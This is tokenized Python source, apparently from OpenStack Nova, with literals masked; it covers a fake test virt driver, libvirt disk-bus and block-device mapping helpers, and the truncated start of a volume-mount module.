<NUM_LIT:0> , retry_interval = <NUM_LIT:0> ) : <EOL> pass <EOL> def finish_revert_migration ( self , context , instance , 
network_info , <EOL> block_device_info = None , power_on = True ) : <EOL> pass <EOL> def post_live_migration_at_destination ( self , context , instance , <EOL> network_info , <EOL> block_migration = False , <EOL> block_device_info = None ) : <EOL> pass <EOL> def power_off ( self , instance , timeout = <NUM_LIT:0> , retry_interval = <NUM_LIT:0> ) : <EOL> pass <EOL> def power_on ( self , context , instance , network_info , <EOL> block_device_info = None ) : <EOL> pass <EOL> def trigger_crash_dump ( self , instance ) : <EOL> pass <EOL> def soft_delete ( self , instance ) : <EOL> pass <EOL> def restore ( self , instance ) : <EOL> pass <EOL> def pause ( self , instance ) : <EOL> pass <EOL> def unpause ( self , instance ) : <EOL> pass <EOL> def suspend ( self , context , instance ) : <EOL> pass <EOL> def resume ( self , context , instance , network_info , block_device_info = None ) : <EOL> pass <EOL> def destroy ( self , context , instance , network_info , block_device_info = None , <EOL> destroy_disks = True , migrate_data = None ) : <EOL> key = instance . uuid <EOL> if key in self . instances : <EOL> flavor = instance . flavor <EOL> self . resources . release ( <EOL> vcpus = flavor . vcpus , <EOL> mem = flavor . memory_mb , <EOL> disk = flavor . root_gb ) <EOL> del self . instances [ key ] <EOL> else : <EOL> LOG . warning ( _LW ( "<STR_LIT>" ) , <EOL> { '<STR_LIT:key>' : key , <EOL> '<STR_LIT>' : self . instances } , instance = instance ) <EOL> def cleanup ( self , context , instance , network_info , block_device_info = None , <EOL> destroy_disks = True , migrate_data = None , destroy_vifs = True ) : <EOL> pass <EOL> def attach_volume ( self , context , connection_info , instance , mountpoint , <EOL> disk_bus = None , device_type = None , encryption = None ) : <EOL> """<STR_LIT>""" <EOL> instance_name = instance . name <EOL> if instance_name not in self . _mounts : <EOL> self . _mounts [ instance_name ] = { } <EOL> self . 
_mounts [ instance_name ] [ mountpoint ] = connection_info <EOL> def detach_volume ( self , connection_info , instance , mountpoint , <EOL> encryption = None ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> del self . _mounts [ instance . name ] [ mountpoint ] <EOL> except KeyError : <EOL> pass <EOL> def swap_volume ( self , old_connection_info , new_connection_info , <EOL> instance , mountpoint , resize_to ) : <EOL> """<STR_LIT>""" <EOL> instance_name = instance . name <EOL> if instance_name not in self . _mounts : <EOL> self . _mounts [ instance_name ] = { } <EOL> self . _mounts [ instance_name ] [ mountpoint ] = new_connection_info <EOL> def attach_interface ( self , instance , image_meta , vif ) : <EOL> if vif [ '<STR_LIT:id>' ] in self . _interfaces : <EOL> raise exception . InterfaceAttachFailed ( <EOL> instance_uuid = instance . uuid ) <EOL> self . _interfaces [ vif [ '<STR_LIT:id>' ] ] = vif <EOL> def detach_interface ( self , instance , vif ) : <EOL> try : <EOL> del self . _interfaces [ vif [ '<STR_LIT:id>' ] ] <EOL> except KeyError : <EOL> raise exception . InterfaceDetachFailed ( <EOL> instance_uuid = instance . uuid ) <EOL> def get_info ( self , instance ) : <EOL> if instance . uuid not in self . instances : <EOL> raise exception . InstanceNotFound ( instance_id = instance . uuid ) <EOL> i = self . instances [ instance . uuid ] <EOL> return hardware . InstanceInfo ( state = i . 
state , <EOL> max_mem_kb = <NUM_LIT:0> , <EOL> mem_kb = <NUM_LIT:0> , <EOL> num_cpu = <NUM_LIT:2> , <EOL> cpu_time_ns = <NUM_LIT:0> ) <EOL> def get_diagnostics ( self , instance ) : <EOL> return { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : - <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } <EOL> def get_instance_diagnostics ( self , instance ) : <EOL> diags = diagnostics . Diagnostics ( state = '<STR_LIT>' , driver = '<STR_LIT>' , <EOL> hypervisor_os = '<STR_LIT>' , uptime = <NUM_LIT> , config_drive = True ) <EOL> diags . add_cpu ( time = <NUM_LIT> ) <EOL> diags . add_nic ( mac_address = '<STR_LIT>' , <EOL> rx_packets = <NUM_LIT> , <EOL> rx_octets = <NUM_LIT> , <EOL> tx_octets = <NUM_LIT> , <EOL> tx_packets = <NUM_LIT> ) <EOL> diags . add_disk ( id = '<STR_LIT>' , <EOL> read_bytes = <NUM_LIT> , <EOL> read_requests = <NUM_LIT> , <EOL> write_bytes = <NUM_LIT> , <EOL> write_requests = <NUM_LIT> ) <EOL> diags . memory_details . 
maximum = <NUM_LIT> <EOL> return diags <EOL> def get_all_bw_counters ( self , instances ) : <EOL> """<STR_LIT>""" <EOL> bw = [ ] <EOL> return bw <EOL> def get_all_volume_usage ( self , context , compute_host_bdms ) : <EOL> """<STR_LIT>""" <EOL> volusage = [ ] <EOL> return volusage <EOL> def get_host_cpu_stats ( self ) : <EOL> stats = { '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT:user>' : <NUM_LIT> , <EOL> '<STR_LIT>' : <NUM_LIT> } <EOL> stats [ '<STR_LIT>' ] = <NUM_LIT> <EOL> return stats <EOL> def block_stats ( self , instance , disk_id ) : <EOL> return [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , None ] <EOL> def get_console_output ( self , context , instance ) : <EOL> return '<STR_LIT>' <EOL> def get_vnc_console ( self , context , instance ) : <EOL> return ctype . ConsoleVNC ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> ) <EOL> def get_spice_console ( self , context , instance ) : <EOL> return ctype . ConsoleSpice ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> , <EOL> tlsPort = <NUM_LIT> ) <EOL> def get_rdp_console ( self , context , instance ) : <EOL> return ctype . ConsoleRDP ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> ) <EOL> def get_serial_console ( self , context , instance ) : <EOL> return ctype . ConsoleSerial ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> ) <EOL> def get_mks_console ( self , context , instance ) : <EOL> return ctype . 
ConsoleMKS ( internal_access_path = '<STR_LIT>' , <EOL> host = '<STR_LIT>' , <EOL> port = <NUM_LIT> ) <EOL> def get_console_pool_info ( self , console_type ) : <EOL> return { '<STR_LIT:address>' : '<STR_LIT:127.0.0.1>' , <EOL> '<STR_LIT:username>' : '<STR_LIT>' , <EOL> '<STR_LIT:password>' : '<STR_LIT>' } <EOL> def refresh_security_group_rules ( self , security_group_id ) : <EOL> return True <EOL> def refresh_instance_security_rules ( self , instance ) : <EOL> return True <EOL> def get_available_resource ( self , nodename ) : <EOL> """<STR_LIT>""" <EOL> cpu_info = collections . OrderedDict ( [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , { <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : <NUM_LIT:4> , <EOL> } ) , <EOL> ] ) <EOL> if nodename not in _FAKE_NODES : <EOL> return { } <EOL> host_status = self . host_status_base . copy ( ) <EOL> host_status . update ( self . resources . dump ( ) ) <EOL> host_status [ '<STR_LIT>' ] = nodename <EOL> host_status [ '<STR_LIT>' ] = nodename <EOL> host_status [ '<STR_LIT>' ] = nodename <EOL> host_status [ '<STR_LIT>' ] = jsonutils . 
dumps ( cpu_info ) <EOL> return host_status <EOL> def ensure_filtering_rules_for_instance ( self , instance , network_info ) : <EOL> return <EOL> def get_instance_disk_info ( self , instance , block_device_info = None ) : <EOL> return <EOL> def live_migration ( self , context , instance , dest , <EOL> post_method , recover_method , block_migration = False , <EOL> migrate_data = None ) : <EOL> post_method ( context , instance , dest , block_migration , <EOL> migrate_data ) <EOL> return <EOL> def live_migration_force_complete ( self , instance ) : <EOL> return <EOL> def live_migration_abort ( self , instance ) : <EOL> return <EOL> def check_can_live_migrate_destination_cleanup ( self , context , <EOL> dest_check_data ) : <EOL> return <EOL> def check_can_live_migrate_destination ( self , context , instance , <EOL> src_compute_info , dst_compute_info , <EOL> block_migration = False , <EOL> disk_over_commit = False ) : <EOL> return { } <EOL> def check_can_live_migrate_source ( self , context , instance , <EOL> dest_check_data , block_device_info = None ) : <EOL> return <EOL> def finish_migration ( self , context , migration , instance , disk_info , <EOL> network_info , image_meta , resize_instance , <EOL> block_device_info = None , power_on = True ) : <EOL> return <EOL> def confirm_migration ( self , migration , instance , network_info ) : <EOL> return <EOL> def pre_live_migration ( self , context , instance , block_device_info , <EOL> network_info , disk_info , migrate_data = None ) : <EOL> return <EOL> def unfilter_instance ( self , instance , network_info ) : <EOL> return <EOL> def _test_remove_vm ( self , instance_uuid ) : <EOL> """<STR_LIT>""" <EOL> self . instances . 
pop ( instance_uuid ) <EOL> def host_power_action ( self , action ) : <EOL> """<STR_LIT>""" <EOL> return action <EOL> def host_maintenance_mode ( self , host , mode ) : <EOL> """<STR_LIT>""" <EOL> if not mode : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def set_host_enabled ( self , enabled ) : <EOL> """<STR_LIT>""" <EOL> if enabled : <EOL> return '<STR_LIT>' <EOL> return '<STR_LIT>' <EOL> def get_volume_connector ( self , instance ) : <EOL> return { '<STR_LIT>' : CONF . my_block_storage_ip , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:host>' : '<STR_LIT>' } <EOL> def get_available_nodes ( self , refresh = False ) : <EOL> return _FAKE_NODES <EOL> def instance_on_disk ( self , instance ) : <EOL> return False <EOL> def quiesce ( self , context , instance , image_meta ) : <EOL> pass <EOL> def unquiesce ( self , context , instance , image_meta ) : <EOL> pass <EOL> class FakeVirtAPI ( virtapi . VirtAPI ) : <EOL> @ contextlib . contextmanager <EOL> def wait_for_instance_event ( self , instance , event_names , deadline = <NUM_LIT> , <EOL> error_callback = None ) : <EOL> yield <EOL> class SmallFakeDriver ( FakeDriver ) : <EOL> vcpus = <NUM_LIT:1> <EOL> memory_mb = <NUM_LIT> <EOL> local_gb = <NUM_LIT> </s>
<s> """<STR_LIT>""" <EOL> import itertools <EOL> import operator <EOL> from oslo_config import cfg <EOL> import six <EOL> from nova import block_device <EOL> from nova . compute import arch <EOL> from nova . compute import vm_mode <EOL> from nova import exception <EOL> from nova . i18n import _ <EOL> from nova . objects import base as obj_base <EOL> from nova . virt import configdrive <EOL> from nova . virt import driver <EOL> from nova . virt . libvirt import utils as libvirt_utils <EOL> from nova . virt import osinfo <EOL> CONF = cfg . CONF <EOL> SUPPORTED_DEVICE_TYPES = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> BOOT_DEV_FOR_TYPE = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> def has_disk_dev ( mapping , disk_dev ) : <EOL> """<STR_LIT>""" <EOL> for disk in mapping : <EOL> info = mapping [ disk ] <EOL> if info [ '<STR_LIT>' ] == disk_dev : <EOL> return True <EOL> return False <EOL> def get_dev_prefix_for_disk_bus ( disk_bus ) : <EOL> """<STR_LIT>""" <EOL> if CONF . libvirt . disk_prefix : <EOL> return CONF . libvirt . disk_prefix <EOL> if disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return None <EOL> elif disk_bus == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> else : <EOL> raise exception . 
NovaException ( <EOL> _ ( "<STR_LIT>" ) % <EOL> disk_bus ) <EOL> def get_dev_count_for_disk_bus ( disk_bus ) : <EOL> """<STR_LIT>""" <EOL> if disk_bus == "<STR_LIT>" : <EOL> return <NUM_LIT:4> <EOL> else : <EOL> return <NUM_LIT> <EOL> def find_disk_dev_for_disk_bus ( mapping , bus , <EOL> last_device = False , <EOL> assigned_devices = None ) : <EOL> """<STR_LIT>""" <EOL> dev_prefix = get_dev_prefix_for_disk_bus ( bus ) <EOL> if dev_prefix is None : <EOL> return None <EOL> if assigned_devices is None : <EOL> assigned_devices = [ ] <EOL> max_dev = get_dev_count_for_disk_bus ( bus ) <EOL> if last_device : <EOL> devs = [ max_dev - <NUM_LIT:1> ] <EOL> else : <EOL> devs = range ( max_dev ) <EOL> for idx in devs : <EOL> disk_dev = dev_prefix + chr ( ord ( '<STR_LIT:a>' ) + idx ) <EOL> if not has_disk_dev ( mapping , disk_dev ) : <EOL> if disk_dev not in assigned_devices : <EOL> return disk_dev <EOL> raise exception . NovaException ( <EOL> _ ( "<STR_LIT>" ) % <EOL> dev_prefix ) <EOL> def is_disk_bus_valid_for_virt ( virt_type , disk_bus ) : <EOL> valid_bus = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> } <EOL> if virt_type not in valid_bus : <EOL> raise exception . UnsupportedVirtType ( virt = virt_type ) <EOL> return disk_bus in valid_bus [ virt_type ] <EOL> def get_disk_bus_for_device_type ( instance , <EOL> virt_type , <EOL> image_meta , <EOL> device_type = "<STR_LIT>" ) : <EOL> """<STR_LIT>""" <EOL> if device_type == "<STR_LIT>" : <EOL> disk_bus = osinfo . HardwareProperties ( image_meta ) . disk_model <EOL> else : <EOL> key = "<STR_LIT>" + device_type + "<STR_LIT>" <EOL> disk_bus = image_meta . properties . 
get ( key ) <EOL> if disk_bus is not None : <EOL> if not is_disk_bus_valid_for_virt ( virt_type , disk_bus ) : <EOL> raise exception . UnsupportedHardware ( model = disk_bus , <EOL> virt = virt_type ) <EOL> return disk_bus <EOL> if virt_type == "<STR_LIT>" : <EOL> if device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif virt_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif virt_type == "<STR_LIT>" : <EOL> guest_vm_mode = vm_mode . get_from_instance ( instance ) <EOL> if guest_vm_mode == vm_mode . HVM : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> elif virt_type in ( "<STR_LIT>" , "<STR_LIT>" ) : <EOL> if device_type == "<STR_LIT>" : <EOL> guestarch = libvirt_utils . get_arch ( image_meta ) <EOL> if guestarch in ( arch . PPC , arch . PPC64 , arch . PPCLE , arch . PPC64LE , <EOL> arch . S390 , arch . S390X ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> elif device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif virt_type == "<STR_LIT>" : <EOL> if device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif device_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> else : <EOL> raise exception . UnsupportedVirtType ( virt = virt_type ) <EOL> return None <EOL> def get_disk_bus_for_disk_dev ( virt_type , disk_dev ) : <EOL> """<STR_LIT>""" <EOL> if disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> if virt_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> elif virt_type == "<STR_LIT>" : <EOL> return "<STR_LIT>" <EOL> else : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> elif disk_dev . 
startswith ( '<STR_LIT>' ) : <EOL> return "<STR_LIT>" <EOL> else : <EOL> raise exception . NovaException ( <EOL> _ ( "<STR_LIT>" ) % <EOL> disk_dev [ : <NUM_LIT:1> ] ) <EOL> def get_next_disk_info ( mapping , disk_bus , <EOL> device_type = '<STR_LIT>' , <EOL> last_device = False , <EOL> boot_index = None , <EOL> assigned_devices = None ) : <EOL> """<STR_LIT>""" <EOL> disk_dev = find_disk_dev_for_disk_bus ( mapping , <EOL> disk_bus , <EOL> last_device , <EOL> assigned_devices ) <EOL> info = { '<STR_LIT>' : disk_bus , <EOL> '<STR_LIT>' : disk_dev , <EOL> '<STR_LIT:type>' : device_type } <EOL> if boot_index is not None and boot_index >= <NUM_LIT:0> : <EOL> info [ '<STR_LIT>' ] = str ( boot_index ) <EOL> return info <EOL> def get_eph_disk ( index ) : <EOL> return '<STR_LIT>' + str ( index ) <EOL> def get_config_drive_type ( ) : <EOL> """<STR_LIT>""" <EOL> if CONF . config_drive_format == '<STR_LIT>' : <EOL> config_drive_type = '<STR_LIT>' <EOL> elif CONF . config_drive_format == '<STR_LIT>' : <EOL> config_drive_type = '<STR_LIT>' <EOL> else : <EOL> raise exception . ConfigDriveUnknownFormat ( <EOL> format = CONF . config_drive_format ) <EOL> return config_drive_type <EOL> def get_info_from_bdm ( instance , virt_type , image_meta , bdm , <EOL> mapping = None , disk_bus = None , <EOL> dev_type = None , allowed_types = None , <EOL> assigned_devices = None ) : <EOL> mapping = mapping or { } <EOL> allowed_types = allowed_types or SUPPORTED_DEVICE_TYPES <EOL> device_name = block_device . strip_dev ( get_device_name ( bdm ) ) <EOL> bdm_type = bdm . get ( '<STR_LIT>' ) or dev_type <EOL> if bdm_type not in allowed_types : <EOL> bdm_type = '<STR_LIT>' <EOL> bdm_bus = bdm . 
get ( '<STR_LIT>' ) or disk_bus <EOL> if not is_disk_bus_valid_for_virt ( virt_type , bdm_bus ) : <EOL> if device_name : <EOL> bdm_bus = get_disk_bus_for_disk_dev ( virt_type , device_name ) <EOL> else : <EOL> bdm_bus = get_disk_bus_for_device_type ( instance , virt_type , <EOL> image_meta , bdm_type ) <EOL> if not device_name : <EOL> if assigned_devices : <EOL> padded_mapping = { dev : { '<STR_LIT>' : dev } for dev in assigned_devices } <EOL> padded_mapping . update ( mapping ) <EOL> else : <EOL> padded_mapping = mapping <EOL> device_name = find_disk_dev_for_disk_bus ( padded_mapping , bdm_bus ) <EOL> bdm_info = { '<STR_LIT>' : bdm_bus , <EOL> '<STR_LIT>' : device_name , <EOL> '<STR_LIT:type>' : bdm_type } <EOL> bdm_format = bdm . get ( '<STR_LIT>' ) <EOL> if bdm_format : <EOL> bdm_info . update ( { '<STR_LIT>' : bdm_format } ) <EOL> boot_index = bdm . get ( '<STR_LIT>' ) <EOL> if boot_index is not None and boot_index >= <NUM_LIT:0> : <EOL> bdm_info [ '<STR_LIT>' ] = str ( boot_index + <NUM_LIT:1> ) <EOL> return bdm_info <EOL> def get_device_name ( bdm ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( bdm , obj_base . NovaObject ) : <EOL> return bdm . device_name <EOL> else : <EOL> return bdm . get ( '<STR_LIT>' ) or bdm . get ( '<STR_LIT>' ) <EOL> def get_root_info ( instance , virt_type , image_meta , root_bdm , <EOL> disk_bus , cdrom_bus , root_device_name = None ) : <EOL> no_root_bdm = ( not root_bdm or ( <EOL> root_bdm . get ( '<STR_LIT>' ) == '<STR_LIT:image>' and <EOL> root_bdm . get ( '<STR_LIT>' ) == '<STR_LIT>' ) ) <EOL> if no_root_bdm : <EOL> if ( image_meta . obj_attr_is_set ( '<STR_LIT>' ) and <EOL> image_meta . 
disk_format == '<STR_LIT>' ) : <EOL> root_device_bus = cdrom_bus <EOL> root_device_type = '<STR_LIT>' <EOL> else : <EOL> root_device_bus = disk_bus <EOL> root_device_type = '<STR_LIT>' <EOL> if root_device_name : <EOL> root_device_bus = get_disk_bus_for_disk_dev ( virt_type , <EOL> root_device_name ) <EOL> else : <EOL> root_device_name = find_disk_dev_for_disk_bus ( { } , root_device_bus ) <EOL> return { '<STR_LIT>' : root_device_bus , <EOL> '<STR_LIT:type>' : root_device_type , <EOL> '<STR_LIT>' : block_device . strip_dev ( root_device_name ) , <EOL> '<STR_LIT>' : '<STR_LIT:1>' } <EOL> if not get_device_name ( root_bdm ) and root_device_name : <EOL> root_bdm = root_bdm . copy ( ) <EOL> root_bdm [ '<STR_LIT>' ] = root_device_name <EOL> return get_info_from_bdm ( instance , virt_type , image_meta , <EOL> root_bdm , { } , disk_bus ) <EOL> def default_device_names ( virt_type , context , instance , block_device_info , <EOL> image_meta ) : <EOL> get_disk_info ( virt_type , instance , image_meta , block_device_info ) <EOL> for driver_bdm in itertools . chain ( block_device_info [ '<STR_LIT>' ] , <EOL> [ block_device_info [ '<STR_LIT>' ] ] if <EOL> block_device_info [ '<STR_LIT>' ] else [ ] , <EOL> block_device_info [ '<STR_LIT>' ] ) : <EOL> driver_bdm . save ( ) <EOL> def has_default_ephemeral ( instance , disk_bus , block_device_info , mapping ) : <EOL> ephemerals = driver . block_device_info_get_ephemerals ( block_device_info ) <EOL> if instance . ephemeral_gb <= <NUM_LIT:0> or ephemerals : <EOL> return None <EOL> else : <EOL> info = get_next_disk_info ( mapping , disk_bus ) <EOL> if block_device . volume_in_mapping ( info [ '<STR_LIT>' ] , block_device_info ) : <EOL> return None <EOL> return info <EOL> def update_bdm ( bdm , info ) : <EOL> device_name_field = ( '<STR_LIT>' <EOL> if '<STR_LIT>' in bdm <EOL> else '<STR_LIT>' ) <EOL> bdm . update ( dict ( zip ( ( device_name_field , <EOL> '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( ( bdm . 
get ( device_name_field ) or <EOL> block_device . prepend_dev ( info [ '<STR_LIT>' ] ) ) , <EOL> info [ '<STR_LIT>' ] , info [ '<STR_LIT:type>' ] ) ) ) ) <EOL> def get_disk_mapping ( virt_type , instance , <EOL> disk_bus , cdrom_bus , <EOL> image_meta , <EOL> block_device_info = None , <EOL> rescue = False ) : <EOL> """<STR_LIT>""" <EOL> mapping = { } <EOL> if rescue : <EOL> rescue_info = get_next_disk_info ( mapping , <EOL> disk_bus , boot_index = <NUM_LIT:1> ) <EOL> mapping [ '<STR_LIT>' ] = rescue_info <EOL> mapping [ '<STR_LIT:root>' ] = rescue_info <EOL> os_info = get_next_disk_info ( mapping , <EOL> disk_bus ) <EOL> mapping [ '<STR_LIT>' ] = os_info <EOL> return mapping <EOL> pre_assigned_device_names = [ block_device . strip_dev ( get_device_name ( bdm ) ) for bdm in itertools . chain ( <EOL> driver . block_device_info_get_ephemerals ( block_device_info ) , <EOL> [ driver . block_device_info_get_swap ( block_device_info ) ] , <EOL> driver . block_device_info_get_mapping ( block_device_info ) ) <EOL> if get_device_name ( bdm ) ] <EOL> root_bdm = block_device . get_root_bdm ( <EOL> driver . block_device_info_get_mapping ( block_device_info ) ) <EOL> root_device_name = block_device . strip_dev ( <EOL> driver . block_device_info_get_root ( block_device_info ) ) <EOL> root_info = get_root_info ( <EOL> instance , virt_type , image_meta , root_bdm , <EOL> disk_bus , cdrom_bus , root_device_name ) <EOL> mapping [ '<STR_LIT:root>' ] = root_info <EOL> if not root_bdm and not block_device . volume_in_mapping ( root_info [ '<STR_LIT>' ] , <EOL> block_device_info ) : <EOL> mapping [ '<STR_LIT>' ] = root_info <EOL> elif root_bdm : <EOL> update_bdm ( root_bdm , root_info ) <EOL> default_eph = has_default_ephemeral ( instance , disk_bus , block_device_info , <EOL> mapping ) <EOL> if default_eph : <EOL> mapping [ '<STR_LIT>' ] = default_eph <EOL> for idx , eph in enumerate ( driver . 
block_device_info_get_ephemerals ( <EOL> block_device_info ) ) : <EOL> eph_info = get_info_from_bdm ( <EOL> instance , virt_type , image_meta , eph , mapping , disk_bus , <EOL> assigned_devices = pre_assigned_device_names ) <EOL> mapping [ get_eph_disk ( idx ) ] = eph_info <EOL> update_bdm ( eph , eph_info ) <EOL> swap = driver . block_device_info_get_swap ( block_device_info ) <EOL> if swap and swap . get ( '<STR_LIT>' , <NUM_LIT:0> ) > <NUM_LIT:0> : <EOL> swap_info = get_info_from_bdm ( <EOL> instance , virt_type , image_meta , <EOL> swap , mapping , disk_bus ) <EOL> mapping [ '<STR_LIT>' ] = swap_info <EOL> update_bdm ( swap , swap_info ) <EOL> elif instance . get_flavor ( ) [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> swap_info = get_next_disk_info ( mapping , disk_bus , <EOL> assigned_devices = pre_assigned_device_names ) <EOL> if not block_device . volume_in_mapping ( swap_info [ '<STR_LIT>' ] , <EOL> block_device_info ) : <EOL> mapping [ '<STR_LIT>' ] = swap_info <EOL> block_device_mapping = driver . block_device_info_get_mapping ( <EOL> block_device_info ) <EOL> for bdm in block_device_mapping : <EOL> vol_info = get_info_from_bdm ( <EOL> instance , virt_type , image_meta , bdm , mapping , <EOL> assigned_devices = pre_assigned_device_names ) <EOL> mapping [ block_device . prepend_dev ( vol_info [ '<STR_LIT>' ] ) ] = vol_info <EOL> update_bdm ( bdm , vol_info ) <EOL> if configdrive . 
required_by ( instance ) : <EOL> device_type = get_config_drive_type ( ) <EOL> disk_bus = get_disk_bus_for_device_type ( instance , <EOL> virt_type , <EOL> image_meta , <EOL> device_type ) <EOL> config_info = get_next_disk_info ( mapping , <EOL> disk_bus , <EOL> device_type , <EOL> last_device = True ) <EOL> mapping [ '<STR_LIT>' ] = config_info <EOL> return mapping <EOL> def get_disk_info ( virt_type , instance , image_meta , <EOL> block_device_info = None , rescue = False ) : <EOL> """<STR_LIT>""" <EOL> disk_bus = get_disk_bus_for_device_type ( instance , virt_type , <EOL> image_meta , "<STR_LIT>" ) <EOL> cdrom_bus = get_disk_bus_for_device_type ( instance , virt_type , <EOL> image_meta , "<STR_LIT>" ) <EOL> mapping = get_disk_mapping ( virt_type , instance , <EOL> disk_bus , cdrom_bus , <EOL> image_meta , <EOL> block_device_info , <EOL> rescue ) <EOL> return { '<STR_LIT>' : disk_bus , <EOL> '<STR_LIT>' : cdrom_bus , <EOL> '<STR_LIT>' : mapping } <EOL> def get_boot_order ( disk_info ) : <EOL> boot_mapping = ( info for name , info in six . iteritems ( disk_info [ '<STR_LIT>' ] ) <EOL> if name != '<STR_LIT:root>' and info . get ( '<STR_LIT>' ) is not None ) <EOL> boot_devs_dup = ( BOOT_DEV_FOR_TYPE [ dev [ '<STR_LIT:type>' ] ] for dev in <EOL> sorted ( boot_mapping , <EOL> key = operator . itemgetter ( '<STR_LIT>' ) ) ) <EOL> def uniq ( lst ) : <EOL> s = set ( ) <EOL> return [ el for el in lst if el not in s and not s . add ( el ) ] <EOL> return uniq ( boot_devs_dup ) </s>
<s> import errno <EOL> import os <EOL> from oslo_concurrency import processutils <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import fileutils <EOL> import six <EOL> from nova import exception as nova_exception <EOL> from nova . i18n import _ <EOL> from nova . i18n import _LE <EOL> from nova . i18n import _LI <EOL> from nova import paths <EOL> from nova import utils <EOL> from nova . virt . libvirt import utils as libvirt_utils <EOL> from nova . virt . libvirt . volume import fs <EOL> LOG = logging . getLogger ( __name__ ) <EOL> volume_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = paths . state_path_def ( '<STR_LIT>' ) , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) , <EOL> ] <EOL> CONF = cfg . CONF <EOL> CONF . register_opts ( volume_opts , '<STR_LIT>' ) <EOL> SOURCE_PROTOCOL = '<STR_LIT>' <EOL> SOURCE_TYPE = '<STR_LIT:file>' <EOL> DRIVER_CACHE = '<STR_LIT:none>' <EOL> DRIVER_IO = '<STR_LIT>' <EOL> def mount_volume ( volume , mnt_base , configfile = None ) : <EOL> """<STR_LIT>""" <EOL> fileutils . ensure_tree ( mnt_base ) <EOL> command = [ '<STR_LIT>' , volume , mnt_base ] <EOL> if configfile : <EOL> command . extend ( [ '<STR_LIT:-c>' , configfile ] ) <EOL> LOG . debug ( '<STR_LIT>' , 